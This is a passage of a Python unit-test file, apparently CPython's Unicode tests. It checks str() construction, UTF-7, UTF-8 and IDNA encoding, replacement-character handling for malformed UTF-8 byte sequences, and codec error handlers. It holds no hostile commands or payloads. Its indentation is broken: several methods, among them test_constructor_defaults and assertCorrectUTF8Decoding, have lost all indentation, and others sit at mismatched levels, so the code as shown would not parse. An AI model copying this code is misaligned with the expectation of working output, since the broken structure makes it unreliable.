        """str(obj) and str(bytes, encoding, errors) construction paths.

        Covers identity on str input, str subclasses, __str__ delegation,
        and decoding of bytes / buffer objects; passing encoding arguments
        together with a str object is an error.
        """
        # unicode(obj) tests (this maps to PyObject_Unicode() at C level)
        self.assertEqual(
            str('unicode remains unicode'),
            'unicode remains unicode'
        )
        # StrSubclass instances keep their text and length, and encode
        # like plain str.  (StrSubclass is defined elsewhere in this file.)
        for text in ('ascii', '\xe9', '\u20ac', '\U0010FFFF'):
            subclass = StrSubclass(text)
            self.assertEqual(str(subclass), text)
            self.assertEqual(len(subclass), len(text))
            if text == 'ascii':
                self.assertEqual(subclass.encode('ascii'), b'ascii')
                self.assertEqual(subclass.encode('utf-8'), b'ascii')
        self.assertEqual(
            str('strings are converted to unicode'),
            'strings are converted to unicode'
        )
        class StringCompat:
            def __init__(self, x):
                self.x = x
            def __str__(self):
                return self.x
        self.assertEqual(
            str(StringCompat('__str__ compatible objects are recognized')),
            '__str__ compatible objects are recognized'
        )
        # unicode(obj) is compatible to str():
        o = StringCompat('unicode(obj) is compatible to str()')
        self.assertEqual(str(o), 'unicode(obj) is compatible to str()')
        self.assertEqual(str(o), 'unicode(obj) is compatible to str()')
        for obj in (123, 123.45, 123):
            self.assertEqual(str(obj), str(str(obj)))
        # unicode(obj, encoding, error) tests (this maps to
        # PyUnicode_FromEncodedObject() at C level)
        if not sys.platform.startswith('java'):
            # Supplying an encoding with a str object is a TypeError.
            self.assertRaises(
                TypeError,
                str,
                'decoding unicode is not supported',
                'utf-8',
                'strict'
            )
        self.assertEqual(
            str(b'strings are decoded to unicode', 'utf-8', 'strict'),
            'strings are decoded to unicode'
        )
        if not sys.platform.startswith('java'):
            # Objects exposing the buffer protocol are decodable too.
            self.assertEqual(
                str(
                    memoryview(b'character buffers are decoded to unicode'),
                    'utf-8',
                    'strict'
                ),
                'character buffers are decoded to unicode'
            )
        self.assertRaises(TypeError, str, 42, 42, 42)
def test_constructor_keyword_args(self):
# The object argument can be passed as a keyword.
self.assertEqual(str(object='foo'), 'foo')
self.assertEqual(str(object=b'foo', encoding='utf-8'), 'foo')
# The errors argument without encoding triggers "decode" mode.
self.assertEqual(str(b'foo', errors='strict'), 'foo') # not "b'foo'"
self.assertEqual(str(object=b'foo', errors='strict'), 'foo')
def test_constructor_defaults(self):
# The object argument defaults to '' or b''.
self.assertEqual(str(), '')
self.assertEqual(str(errors='strict'), '')
utf8_cent = '¢'.encode('utf-8')
# The encoding argument defaults to utf-8.
self.assertEqual(str(utf8_cent, errors='strict'), '¢')
# The errors argument defaults to strict.
self.assertRaises(UnicodeDecodeError, str, utf8_cent, encoding='ascii')
    def test_codecs_utf7(self):
        """UTF-7 round-trips: RFC 2152 examples, '+' escaping, surrogate
        handling, and the directly-encodable character sets."""
        utfTests = [
            ('A\u2262\u0391.', b'A+ImIDkQ.'),             # RFC2152 example
            ('Hi Mom -\u263a-!', b'Hi Mom -+Jjo--!'),     # RFC2152 example
            ('\u65E5\u672C\u8A9E', b'+ZeVnLIqe-'),        # RFC2152 example
            ('Item 3 is \u00a31.', b'Item 3 is +AKM-1.'), # RFC2152 example
            ('+', b'+-'),
            ('+-', b'+--'),
            ('+?', b'+-?'),
            (r'\?', b'+AFw?'),
            ('+?', b'+-?'),
            (r'\\?', b'+AFwAXA?'),
            (r'\\\?', b'+AFwAXABc?'),
            (r'++--', b'+-+---'),
            ('\U000abcde', b'+2m/c3g-'),                  # surrogate pairs
            ('/', b'/'),
        ]
        for (x, y) in utfTests:
            self.assertEqual(x.encode('utf-7'), y)
        # Unpaired surrogates are passed through
        self.assertEqual('\uD801'.encode('utf-7'), b'+2AE-')
        self.assertEqual('\uD801x'.encode('utf-7'), b'+2AE-x')
        self.assertEqual('\uDC01'.encode('utf-7'), b'+3AE-')
        self.assertEqual('\uDC01x'.encode('utf-7'), b'+3AE-x')
        self.assertEqual(b'+2AE-'.decode('utf-7'), '\uD801')
        self.assertEqual(b'+2AE-x'.decode('utf-7'), '\uD801x')
        self.assertEqual(b'+3AE-'.decode('utf-7'), '\uDC01')
        self.assertEqual(b'+3AE-x'.decode('utf-7'), '\uDC01x')
        self.assertEqual('\uD801\U000abcde'.encode('utf-7'), b'+2AHab9ze-')
        self.assertEqual(b'+2AHab9ze-'.decode('utf-7'), '\uD801\U000abcde')
        # Issue #2242: crash on some Windows/MSVC versions
        self.assertEqual(b'+\xc1'.decode('utf-7', 'ignore'), '')
        # Direct encoded characters (set D of RFC 2152): never escaped.
        set_d = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'(),-./:?"
        # Optional direct characters (set O): decodable, encoding varies.
        set_o = '!"#$%&*;<=>@[]^_`{|}'
        for c in set_d:
            self.assertEqual(c.encode('utf7'), c.encode('ascii'))
            self.assertEqual(c.encode('ascii').decode('utf7'), c)
        for c in set_o:
            self.assertEqual(c.encode('ascii').decode('utf7'), c)
    def test_codecs_utf8(self):
        """UTF-8 encoding of BMP, astral and (via surrogatepass) lone
        surrogate code points, plus a longer mixed-script round trip."""
        self.assertEqual(''.encode('utf-8'), b'')
        self.assertEqual('\u20ac'.encode('utf-8'), b'\xe2\x82\xac')
        self.assertEqual('\U00010002'.encode('utf-8'), b'\xf0\x90\x80\x82')
        self.assertEqual('\U00023456'.encode('utf-8'), b'\xf0\xa3\x91\x96')
        # Lone surrogates only encode with the surrogatepass handler.
        self.assertEqual('\ud800'.encode('utf-8', 'surrogatepass'), b'\xed\xa0\x80')
        self.assertEqual('\udc00'.encode('utf-8', 'surrogatepass'), b'\xed\xb0\x80')
        self.assertEqual(('\U00010002'*10).encode('utf-8'),
                         b'\xf0\x90\x80\x82'*10)
        self.assertEqual(
            '\u6b63\u78ba\u306b\u8a00\u3046\u3068\u7ffb\u8a33\u306f'
            '\u3055\u308c\u3066\u3044\u307e\u305b\u3093\u3002\u4e00'
            '\u90e8\u306f\u30c9\u30a4\u30c4\u8a9e\u3067\u3059\u304c'
            '\u3001\u3042\u3068\u306f\u3067\u305f\u3089\u3081\u3067'
            '\u3059\u3002\u5b9f\u969b\u306b\u306f\u300cWenn ist das'
            ' Nunstuck git und'.encode('utf-8'),
            b'\xe6\xad\xa3\xe7\xa2\xba\xe3\x81\xab\xe8\xa8\x80\xe3\x81'
            b'\x86\xe3\x81\xa8\xe7\xbf\xbb\xe8\xa8\xb3\xe3\x81\xaf\xe3'
            b'\x81\x95\xe3\x82\x8c\xe3\x81\xa6\xe3\x81\x84\xe3\x81\xbe'
            b'\xe3\x81\x9b\xe3\x82\x93\xe3\x80\x82\xe4\xb8\x80\xe9\x83'
            b'\xa8\xe3\x81\xaf\xe3\x83\x89\xe3\x82\xa4\xe3\x83\x84\xe8'
            b'\xaa\x9e\xe3\x81\xa7\xe3\x81\x99\xe3\x81\x8c\xe3\x80\x81'
            b'\xe3\x81\x82\xe3\x81\xa8\xe3\x81\xaf\xe3\x81\xa7\xe3\x81'
            b'\x9f\xe3\x82\x89\xe3\x82\x81\xe3\x81\xa7\xe3\x81\x99\xe3'
            b'\x80\x82\xe5\xae\x9f\xe9\x9a\x9b\xe3\x81\xab\xe3\x81\xaf'
            b'\xe3\x80\x8cWenn ist das Nunstuck git und'
        )
        # UTF-8 specific decoding tests
        self.assertEqual(str(b'\xf0\xa3\x91\x96', 'utf-8'), '\U00023456' )
        self.assertEqual(str(b'\xf0\x90\x80\x82', 'utf-8'), '\U00010002' )
        self.assertEqual(str(b'\xe2\x82\xac', 'utf-8'), '\u20ac' )
        # Other possible utf-8 test cases:
        # * strict decoding testing for all of the
        #   UTF8_ERROR cases in PyUnicode_DecodeUTF8
def test_utf8_decode_valid_sequences(self):
sequences = [
# single byte
(b'\x00', '\x00'), (b'a', 'a'), (b'\x7f', '\x7f'),
# 2 bytes
(b'\xc2\x80', '\x80'), (b'\xdf\xbf', '\u07ff'),
# 3 bytes
(b'\xe0\xa0\x80', '\u0800'), (b'\xed\x9f\xbf', '\ud7ff'),
(b'\xee\x80\x80', '\uE000'), (b'\xef\xbf\xbf', '\uffff'),
# 4 bytes
(b'\xF0\x90\x80\x80', '\U00010000'),
(b'\xf4\x8f\xbf\xbf', '\U0010FFFF')
]
for seq, res in sequences:
self.assertEqual(seq.decode('utf-8'), res)
    def test_utf8_decode_invalid_sequences(self):
        """Strict UTF-8 decoding must reject malformed sequences:
        bad start bytes, over-long encodings, surrogates, and code points
        above U+10FFFF."""
        # continuation bytes in a sequence of 2, 3, or 4 bytes
        continuation_bytes = [bytes([x]) for x in range(0x80, 0xC0)]
        # start bytes of a 2-byte sequence equivalent to code points < 0x7F
        invalid_2B_seq_start_bytes = [bytes([x]) for x in range(0xC0, 0xC2)]
        # start bytes of a 4-byte sequence equivalent to code points > 0x10FFFF
        invalid_4B_seq_start_bytes = [bytes([x]) for x in range(0xF5, 0xF8)]
        invalid_start_bytes = (
            continuation_bytes + invalid_2B_seq_start_bytes +
            invalid_4B_seq_start_bytes + [bytes([x]) for x in range(0xF7, 0x100)]
        )
        for byte in invalid_start_bytes:
            self.assertRaises(UnicodeDecodeError, byte.decode, 'utf-8')
        # Over-long 2-byte encodings: C0/C1 start + any continuation byte.
        for sb in invalid_2B_seq_start_bytes:
            for cb in continuation_bytes:
                self.assertRaises(UnicodeDecodeError, (sb+cb).decode, 'utf-8')
        # Out-of-range 4-byte encodings (only a sample of continuation
        # bytes, to keep the test fast).
        for sb in invalid_4B_seq_start_bytes:
            for cb1 in continuation_bytes[:3]:
                for cb3 in continuation_bytes[:3]:
                    self.assertRaises(UnicodeDecodeError,
                                      (sb+cb1+b'\x80'+cb3).decode, 'utf-8')
        # Over-long 3-byte encodings: E0 requires a continuation >= A0.
        for cb in [bytes([x]) for x in range(0x80, 0xA0)]:
            self.assertRaises(UnicodeDecodeError,
                              (b'\xE0'+cb+b'\x80').decode, 'utf-8')
            self.assertRaises(UnicodeDecodeError,
                              (b'\xE0'+cb+b'\xBF').decode, 'utf-8')
        # surrogates
        for cb in [bytes([x]) for x in range(0xA0, 0xC0)]:
            self.assertRaises(UnicodeDecodeError,
                              (b'\xED'+cb+b'\x80').decode, 'utf-8')
            self.assertRaises(UnicodeDecodeError,
                              (b'\xED'+cb+b'\xBF').decode, 'utf-8')
        # Over-long 4-byte encodings: F0 requires a continuation >= 90.
        for cb in [bytes([x]) for x in range(0x80, 0x90)]:
            self.assertRaises(UnicodeDecodeError,
                              (b'\xF0'+cb+b'\x80\x80').decode, 'utf-8')
            self.assertRaises(UnicodeDecodeError,
                              (b'\xF0'+cb+b'\xBF\xBF').decode, 'utf-8')
        # Above U+10FFFF: F4 requires a continuation <= 8F.
        for cb in [bytes([x]) for x in range(0x90, 0xC0)]:
            self.assertRaises(UnicodeDecodeError,
                              (b'\xF4'+cb+b'\x80\x80').decode, 'utf-8')
            self.assertRaises(UnicodeDecodeError,
                              (b'\xF4'+cb+b'\xBF\xBF').decode, 'utf-8')
    def test_issue8271(self):
        """Replacement-character placement for invalid UTF-8 (issue #8271).

        Each maximal invalid subpart becomes exactly one U+FFFD; valid
        bytes embedded in the garbage are preserved.  Every sequence is
        checked with the 'strict', 'replace' and 'ignore' handlers.
        """
        # Issue #8271: during the decoding of an invalid UTF-8 byte sequence,
        # only the start byte and the continuation byte(s) are now considered
        # invalid, instead of the number of bytes specified by the start byte.
        # See http://www.unicode.org/versions/Unicode5.2.0/ch03.pdf (page 95,
        # table 3-8, Row 2) for more information about the algorithm used.
        FFFD = '\ufffd'
        sequences = [
            # invalid start bytes
            (b'\x80', FFFD), # continuation byte
            (b'\x80\x80', FFFD*2), # 2 continuation bytes
            (b'\xc0', FFFD),
            (b'\xc0\xc0', FFFD*2),
            (b'\xc1', FFFD),
            (b'\xc1\xc0', FFFD*2),
            (b'\xc0\xc1', FFFD*2),
            # with start byte of a 2-byte sequence
            (b'\xc2', FFFD), # only the start byte
            (b'\xc2\xc2', FFFD*2), # 2 start bytes
            (b'\xc2\xc2\xc2', FFFD*3), # 3 start bytes
            (b'\xc2\x41', FFFD+'A'), # invalid continuation byte
            # with start byte of a 3-byte sequence
            (b'\xe1', FFFD), # only the start byte
            (b'\xe1\xe1', FFFD*2), # 2 start bytes
            (b'\xe1\xe1\xe1', FFFD*3), # 3 start bytes
            (b'\xe1\xe1\xe1\xe1', FFFD*4), # 4 start bytes
            (b'\xe1\x80', FFFD), # only 1 continuation byte
            (b'\xe1\x41', FFFD+'A'), # invalid continuation byte
            (b'\xe1\x41\x80', FFFD+'A'+FFFD), # invalid cb followed by valid cb
            (b'\xe1\x41\x41', FFFD+'AA'), # 2 invalid continuation bytes
            (b'\xe1\x80\x41', FFFD+'A'), # only 1 valid continuation byte
            (b'\xe1\x80\xe1\x41', FFFD*2+'A'), # 1 valid and the other invalid
            (b'\xe1\x41\xe1\x80', FFFD+'A'+FFFD), # 1 invalid and the other valid
            # with start byte of a 4-byte sequence
            (b'\xf1', FFFD), # only the start byte
            (b'\xf1\xf1', FFFD*2), # 2 start bytes
            (b'\xf1\xf1\xf1', FFFD*3), # 3 start bytes
            (b'\xf1\xf1\xf1\xf1', FFFD*4), # 4 start bytes
            (b'\xf1\xf1\xf1\xf1\xf1', FFFD*5), # 5 start bytes
            (b'\xf1\x80', FFFD), # only 1 continuation bytes
            (b'\xf1\x80\x80', FFFD), # only 2 continuation bytes
            (b'\xf1\x80\x41', FFFD+'A'), # 1 valid cb and 1 invalid
            (b'\xf1\x80\x41\x41', FFFD+'AA'), # 1 valid cb and 1 invalid
            (b'\xf1\x80\x80\x41', FFFD+'A'), # 2 valid cb and 1 invalid
            (b'\xf1\x41\x80', FFFD+'A'+FFFD), # 1 invalid cv and 1 valid
            (b'\xf1\x41\x80\x80', FFFD+'A'+FFFD*2), # 1 invalid cb and 2 invalid
            (b'\xf1\x41\x80\x41', FFFD+'A'+FFFD+'A'), # 2 invalid cb and 1 invalid
            (b'\xf1\x41\x41\x80', FFFD+'AA'+FFFD), # 1 valid cb and 1 invalid
            (b'\xf1\x41\xf1\x80', FFFD+'A'+FFFD),
            (b'\xf1\x41\x80\xf1', FFFD+'A'+FFFD*2),
            (b'\xf1\xf1\x80\x41', FFFD*2+'A'),
            (b'\xf1\x41\xf1\xf1', FFFD+'A'+FFFD*2),
            # with invalid start byte of a 4-byte sequence (rfc2279)
            (b'\xf5', FFFD), # only the start byte
            (b'\xf5\xf5', FFFD*2), # 2 start bytes
            (b'\xf5\x80', FFFD*2), # only 1 continuation byte
            (b'\xf5\x80\x80', FFFD*3), # only 2 continuation byte
            (b'\xf5\x80\x80\x80', FFFD*4), # 3 continuation bytes
            (b'\xf5\x80\x41', FFFD*2+'A'), #  1 valid cb and 1 invalid
            (b'\xf5\x80\x41\xf5', FFFD*2+'A'+FFFD),
            (b'\xf5\x41\x80\x80\x41', FFFD+'A'+FFFD*2+'A'),
            # with invalid start byte of a 5-byte sequence (rfc2279)
            (b'\xf8', FFFD), # only the start byte
            (b'\xf8\xf8', FFFD*2), # 2 start bytes
            (b'\xf8\x80', FFFD*2), # only one continuation byte
            (b'\xf8\x80\x41', FFFD*2 + 'A'), # 1 valid cb and 1 invalid
            (b'\xf8\x80\x80\x80\x80', FFFD*5), # invalid 5 bytes seq with 5 bytes
            # with invalid start byte of a 6-byte sequence (rfc2279)
            (b'\xfc', FFFD), # only the start byte
            (b'\xfc\xfc', FFFD*2), # 2 start bytes
            (b'\xfc\x80\x80', FFFD*3), # only 2 continuation bytes
            (b'\xfc\x80\x80\x80\x80\x80', FFFD*6), # 6 continuation bytes
            # invalid start byte
            (b'\xfe', FFFD),
            (b'\xfe\x80\x80', FFFD*3),
            # other sequences
            (b'\xf1\x80\x41\x42\x43', '\ufffd\x41\x42\x43'),
            (b'\xf1\x80\xff\x42\x43', '\ufffd\ufffd\x42\x43'),
            (b'\xf1\x80\xc2\x81\x43', '\ufffd\x81\x43'),
            (b'\x61\xF1\x80\x80\xE1\x80\xC2\x62\x80\x63\x80\xBF\x64',
             '\x61\uFFFD\uFFFD\uFFFD\x62\uFFFD\x63\uFFFD\uFFFD\x64'),
        ]
        for n, (seq, res) in enumerate(sequences):
            self.assertRaises(UnicodeDecodeError, seq.decode, 'utf-8', 'strict')
            self.assertEqual(seq.decode('utf-8', 'replace'), res)
            self.assertEqual((seq+b'b').decode('utf-8', 'replace'), res+'b')
            self.assertEqual(seq.decode('utf-8', 'ignore'),
                             res.replace('\uFFFD', ''))
def assertCorrectUTF8Decoding(self, seq, res, err):
with self.assertRaises(UnicodeDecodeError) as cm:
seq.decode('utf-8')
exc = cm.exception
self.assertIn(err, str(exc))
self.assertEqual(seq.decode('utf-8', 'replace'), res)
self.assertEqual((b'aaaa' + seq + b'bbbb').decode('utf-8', 'replace'),
'aaaa' + res + 'bbbb')
res = res.replace('\ufffd', '')
self.assertEqual(seq.decode('utf-8', 'ignore'), res)
self.assertEqual((b'aaaa' + seq + b'bbbb').decode('utf-8', 'ignore'),
'aaaa' + res + 'bbbb')
def test_invalid_start_byte(self):
FFFD = '\ufffd'
for byte in b'\x80\xA0\x9F\xBF\xC0\xC1\xF5\xFF':
self.assertCorrectUTF8Decoding(bytes([byte]), '\ufffd',
'invalid start byte')
def test_unexpected_end_of_data(self):
sequences = [
'C2', 'DF',
'E0 A0', 'E0 BF', 'E1 80', 'E1 BF', 'EC 80', 'EC BF',
'ED 80', 'ED 9F', 'EE 80', 'EE BF', 'EF 80', 'EF BF',
'F0 90', 'F0 BF', 'F0 90 80', 'F0 90 BF', 'F0 BF 80', 'F0 BF BF',
'F1 80', 'F1 BF', 'F1 80 80', 'F1 80 BF', 'F1 BF 80', 'F1 BF BF',
'F3 80', 'F3 BF', 'F3 80 80', 'F3 80 BF', 'F3 BF 80', 'F3 BF BF',
'F4 80', 'F4 8F', 'F4 80 80', 'F4 80 BF', 'F4 8F 80', 'F4 8F BF'
]
FFFD = '\ufffd'
for seq in sequences:
self.assertCorrectUTF8Decoding(bytes.fromhex(seq), '\ufffd',
'unexpected end of data')
def test_invalid_cb_for_2bytes_seq(self):
FFFD = '\ufffd'
FFFDx2 = FFFD * 2
sequences = [
('C2 00', FFFD+'\x00'), ('C2 7F', FFFD+'\x7f'),
('C2 C0', FFFDx2), ('C2 FF', FFFDx2),
('DF 00', FFFD+'\x00'), ('DF 7F', FFFD+'\x7f'),
('DF C0', FFFDx2), ('DF FF', FFFDx2),
]
for seq, res in sequences:
self.assertCorrectUTF8Decoding(bytes.fromhex(seq), res,
'invalid continuation byte')
    def test_invalid_cb_for_3bytes_seq(self):
        """3-byte UTF-8 starters followed by invalid continuation bytes:
        the invalid prefix becomes one U+FFFD, a trailing ASCII byte is
        kept, and a trailing non-continuation byte becomes another
        U+FFFD."""
        FFFD = '\ufffd'
        FFFDx2 = FFFD * 2
        sequences = [
            ('E0 00', FFFD+'\x00'), ('E0 7F', FFFD+'\x7f'), ('E0 80', FFFDx2),
            ('E0 9F', FFFDx2), ('E0 C0', FFFDx2), ('E0 FF', FFFDx2),
            ('E0 A0 00', FFFD+'\x00'), ('E0 A0 7F', FFFD+'\x7f'),
            ('E0 A0 C0', FFFDx2), ('E0 A0 FF', FFFDx2),
            ('E0 BF 00', FFFD+'\x00'), ('E0 BF 7F', FFFD+'\x7f'),
            ('E0 BF C0', FFFDx2), ('E0 BF FF', FFFDx2), ('E1 00', FFFD+'\x00'),
            ('E1 7F', FFFD+'\x7f'), ('E1 C0', FFFDx2), ('E1 FF', FFFDx2),
            ('E1 80 00', FFFD+'\x00'), ('E1 80 7F', FFFD+'\x7f'),
            ('E1 80 C0', FFFDx2), ('E1 80 FF', FFFDx2),
            ('E1 BF 00', FFFD+'\x00'), ('E1 BF 7F', FFFD+'\x7f'),
            ('E1 BF C0', FFFDx2), ('E1 BF FF', FFFDx2), ('EC 00', FFFD+'\x00'),
            ('EC 7F', FFFD+'\x7f'), ('EC C0', FFFDx2), ('EC FF', FFFDx2),
            ('EC 80 00', FFFD+'\x00'), ('EC 80 7F', FFFD+'\x7f'),
            ('EC 80 C0', FFFDx2), ('EC 80 FF', FFFDx2),
            ('EC BF 00', FFFD+'\x00'), ('EC BF 7F', FFFD+'\x7f'),
            ('EC BF C0', FFFDx2), ('EC BF FF', FFFDx2), ('ED 00', FFFD+'\x00'),
            ('ED 7F', FFFD+'\x7f'),
            # ED A0..BF would encode surrogates, so A0..BF are invalid
            # continuation bytes after an ED starter.
            ('ED A0', FFFDx2), ('ED BF', FFFDx2),
            ('ED C0', FFFDx2), ('ED FF', FFFDx2), ('ED 80 00', FFFD+'\x00'),
            ('ED 80 7F', FFFD+'\x7f'), ('ED 80 C0', FFFDx2),
            ('ED 80 FF', FFFDx2), ('ED 9F 00', FFFD+'\x00'),
            ('ED 9F 7F', FFFD+'\x7f'), ('ED 9F C0', FFFDx2),
            ('ED 9F FF', FFFDx2), ('EE 00', FFFD+'\x00'),
            ('EE 7F', FFFD+'\x7f'), ('EE C0', FFFDx2), ('EE FF', FFFDx2),
            ('EE 80 00', FFFD+'\x00'), ('EE 80 7F', FFFD+'\x7f'),
            ('EE 80 C0', FFFDx2), ('EE 80 FF', FFFDx2),
            ('EE BF 00', FFFD+'\x00'), ('EE BF 7F', FFFD+'\x7f'),
            ('EE BF C0', FFFDx2), ('EE BF FF', FFFDx2), ('EF 00', FFFD+'\x00'),
            ('EF 7F', FFFD+'\x7f'), ('EF C0', FFFDx2), ('EF FF', FFFDx2),
            ('EF 80 00', FFFD+'\x00'), ('EF 80 7F', FFFD+'\x7f'),
            ('EF 80 C0', FFFDx2), ('EF 80 FF', FFFDx2),
            ('EF BF 00', FFFD+'\x00'), ('EF BF 7F', FFFD+'\x7f'),
            ('EF BF C0', FFFDx2), ('EF BF FF', FFFDx2),
        ]
        for seq, res in sequences:
            self.assertCorrectUTF8Decoding(bytes.fromhex(seq), res,
                                           'invalid continuation byte')
    def test_invalid_cb_for_4bytes_seq(self):
        """4-byte UTF-8 starters followed by invalid continuation bytes:
        the invalid prefix becomes one U+FFFD, a trailing ASCII byte is
        kept, and a trailing non-continuation byte becomes another
        U+FFFD.  F0 restricts its second byte to 90..BF (no over-long
        forms) and F4 to 80..8F (nothing above U+10FFFF)."""
        FFFD = '\ufffd'
        FFFDx2 = FFFD * 2
        sequences = [
            ('F0 00', FFFD+'\x00'), ('F0 7F', FFFD+'\x7f'), ('F0 80', FFFDx2),
            ('F0 8F', FFFDx2), ('F0 C0', FFFDx2), ('F0 FF', FFFDx2),
            ('F0 90 00', FFFD+'\x00'), ('F0 90 7F', FFFD+'\x7f'),
            ('F0 90 C0', FFFDx2), ('F0 90 FF', FFFDx2),
            ('F0 BF 00', FFFD+'\x00'), ('F0 BF 7F', FFFD+'\x7f'),
            ('F0 BF C0', FFFDx2), ('F0 BF FF', FFFDx2),
            ('F0 90 80 00', FFFD+'\x00'), ('F0 90 80 7F', FFFD+'\x7f'),
            ('F0 90 80 C0', FFFDx2), ('F0 90 80 FF', FFFDx2),
            ('F0 90 BF 00', FFFD+'\x00'), ('F0 90 BF 7F', FFFD+'\x7f'),
            ('F0 90 BF C0', FFFDx2), ('F0 90 BF FF', FFFDx2),
            ('F0 BF 80 00', FFFD+'\x00'), ('F0 BF 80 7F', FFFD+'\x7f'),
            ('F0 BF 80 C0', FFFDx2), ('F0 BF 80 FF', FFFDx2),
            ('F0 BF BF 00', FFFD+'\x00'), ('F0 BF BF 7F', FFFD+'\x7f'),
            ('F0 BF BF C0', FFFDx2), ('F0 BF BF FF', FFFDx2),
            ('F1 00', FFFD+'\x00'), ('F1 7F', FFFD+'\x7f'), ('F1 C0', FFFDx2),
            ('F1 FF', FFFDx2), ('F1 80 00', FFFD+'\x00'),
            ('F1 80 7F', FFFD+'\x7f'), ('F1 80 C0', FFFDx2),
            ('F1 80 FF', FFFDx2), ('F1 BF 00', FFFD+'\x00'),
            ('F1 BF 7F', FFFD+'\x7f'), ('F1 BF C0', FFFDx2),
            ('F1 BF FF', FFFDx2), ('F1 80 80 00', FFFD+'\x00'),
            ('F1 80 80 7F', FFFD+'\x7f'), ('F1 80 80 C0', FFFDx2),
            ('F1 80 80 FF', FFFDx2), ('F1 80 BF 00', FFFD+'\x00'),
            ('F1 80 BF 7F', FFFD+'\x7f'), ('F1 80 BF C0', FFFDx2),
            ('F1 80 BF FF', FFFDx2), ('F1 BF 80 00', FFFD+'\x00'),
            ('F1 BF 80 7F', FFFD+'\x7f'), ('F1 BF 80 C0', FFFDx2),
            ('F1 BF 80 FF', FFFDx2), ('F1 BF BF 00', FFFD+'\x00'),
            ('F1 BF BF 7F', FFFD+'\x7f'), ('F1 BF BF C0', FFFDx2),
            ('F1 BF BF FF', FFFDx2), ('F3 00', FFFD+'\x00'),
            ('F3 7F', FFFD+'\x7f'), ('F3 C0', FFFDx2), ('F3 FF', FFFDx2),
            ('F3 80 00', FFFD+'\x00'), ('F3 80 7F', FFFD+'\x7f'),
            ('F3 80 C0', FFFDx2), ('F3 80 FF', FFFDx2),
            ('F3 BF 00', FFFD+'\x00'), ('F3 BF 7F', FFFD+'\x7f'),
            ('F3 BF C0', FFFDx2), ('F3 BF FF', FFFDx2),
            ('F3 80 80 00', FFFD+'\x00'), ('F3 80 80 7F', FFFD+'\x7f'),
            ('F3 80 80 C0', FFFDx2), ('F3 80 80 FF', FFFDx2),
            ('F3 80 BF 00', FFFD+'\x00'), ('F3 80 BF 7F', FFFD+'\x7f'),
            ('F3 80 BF C0', FFFDx2), ('F3 80 BF FF', FFFDx2),
            ('F3 BF 80 00', FFFD+'\x00'), ('F3 BF 80 7F', FFFD+'\x7f'),
            ('F3 BF 80 C0', FFFDx2), ('F3 BF 80 FF', FFFDx2),
            ('F3 BF BF 00', FFFD+'\x00'), ('F3 BF BF 7F', FFFD+'\x7f'),
            ('F3 BF BF C0', FFFDx2), ('F3 BF BF FF', FFFDx2),
            ('F4 00', FFFD+'\x00'), ('F4 7F', FFFD+'\x7f'), ('F4 90', FFFDx2),
            ('F4 BF', FFFDx2), ('F4 C0', FFFDx2), ('F4 FF', FFFDx2),
            ('F4 80 00', FFFD+'\x00'), ('F4 80 7F', FFFD+'\x7f'),
            ('F4 80 C0', FFFDx2), ('F4 80 FF', FFFDx2),
            ('F4 8F 00', FFFD+'\x00'), ('F4 8F 7F', FFFD+'\x7f'),
            ('F4 8F C0', FFFDx2), ('F4 8F FF', FFFDx2),
            ('F4 80 80 00', FFFD+'\x00'), ('F4 80 80 7F', FFFD+'\x7f'),
            ('F4 80 80 C0', FFFDx2), ('F4 80 80 FF', FFFDx2),
            ('F4 80 BF 00', FFFD+'\x00'), ('F4 80 BF 7F', FFFD+'\x7f'),
            ('F4 80 BF C0', FFFDx2), ('F4 80 BF FF', FFFDx2),
            ('F4 8F 80 00', FFFD+'\x00'), ('F4 8F 80 7F', FFFD+'\x7f'),
            ('F4 8F 80 C0', FFFDx2), ('F4 8F 80 FF', FFFDx2),
            ('F4 8F BF 00', FFFD+'\x00'), ('F4 8F BF 7F', FFFD+'\x7f'),
            ('F4 8F BF C0', FFFDx2), ('F4 8F BF FF', FFFDx2)
        ]
        for seq, res in sequences:
            self.assertCorrectUTF8Decoding(bytes.fromhex(seq), res,
                                           'invalid continuation byte')
def test_codecs_idna(self):
    """The IDNA codec must preserve a trailing dot when encoding."""
    encoded = "www.python.org.".encode("idna")
    self.assertEqual(encoded, b"www.python.org.")
def test_codecs_errors(self):
    """Exercise codec error handlers ('strict', 'ignore', 'replace') for
    both encoding and decoding, plus argument validation for lookups."""
    # Error handling (encoding)
    self.assertRaises(UnicodeError, 'Andr\202 x'.encode, 'ascii')
    self.assertRaises(UnicodeError, 'Andr\202 x'.encode, 'ascii','strict')
    self.assertEqual('Andr\202 x'.encode('ascii','ignore'), b"Andr x")
    self.assertEqual('Andr\202 x'.encode('ascii','replace'), b"Andr? x")
    # Positional and keyword forms of the error handler must agree.
    self.assertEqual('Andr\202 x'.encode('ascii', 'replace'),
                     'Andr\202 x'.encode('ascii', errors='replace'))
    self.assertEqual('Andr\202 x'.encode('ascii', 'ignore'),
                     'Andr\202 x'.encode(encoding='ascii', errors='ignore'))
    # Error handling (decoding)
    self.assertRaises(UnicodeError, str, b'Andr\202 x', 'ascii')
    self.assertRaises(UnicodeError, str, b'Andr\202 x', 'ascii', 'strict')
    self.assertEqual(str(b'Andr\202 x', 'ascii', 'ignore'), "Andr x")
    self.assertEqual(str(b'Andr\202 x', 'ascii', 'replace'), 'Andr\uFFFD x')
    self.assertEqual(str(b'\202 x', 'ascii', 'replace'), '\uFFFD x')
    # Error handling (unknown character names)
    self.assertEqual(b"\\N{foo}xx".decode("unicode-escape", "ignore"), "xx")
    # Error handling (truncated escape sequence)
    self.assertRaises(UnicodeError, b"\\".decode, "unicode-escape")
    # "test.unicode1"/"test.unicode2" are presumably codecs registered
    # elsewhere by the test harness that misbehave on purpose — TODO confirm.
    self.assertRaises(TypeError, b"hello".decode, "test.unicode1")
    self.assertRaises(TypeError, str, b"hello", "test.unicode2")
    self.assertRaises(TypeError, "hello".encode, "test.unicode1")
    self.assertRaises(TypeError, "hello".encode, "test.unicode2")
    # Error handling (wrong arguments)
    self.assertRaises(TypeError, "hello".encode, 42, 42, 42)
    # Error handling (lone surrogate in PyUnicode_TransformDecimalToASCII())
    self.assertRaises(UnicodeError, float, "\ud800")
    self.assertRaises(UnicodeError, float, "\udf00")
    self.assertRaises(UnicodeError, complex, "\ud800")
    self.assertRaises(UnicodeError, complex, "\udf00")
def test_codecs(self):
    """Round-trip the core codecs over ASCII, Latin-1, BMP and
    astral code-point ranges."""
    # Encoding
    self.assertEqual('hello'.encode('ascii'), b'hello')
    self.assertEqual('hello'.encode('utf-7'), b'hello')
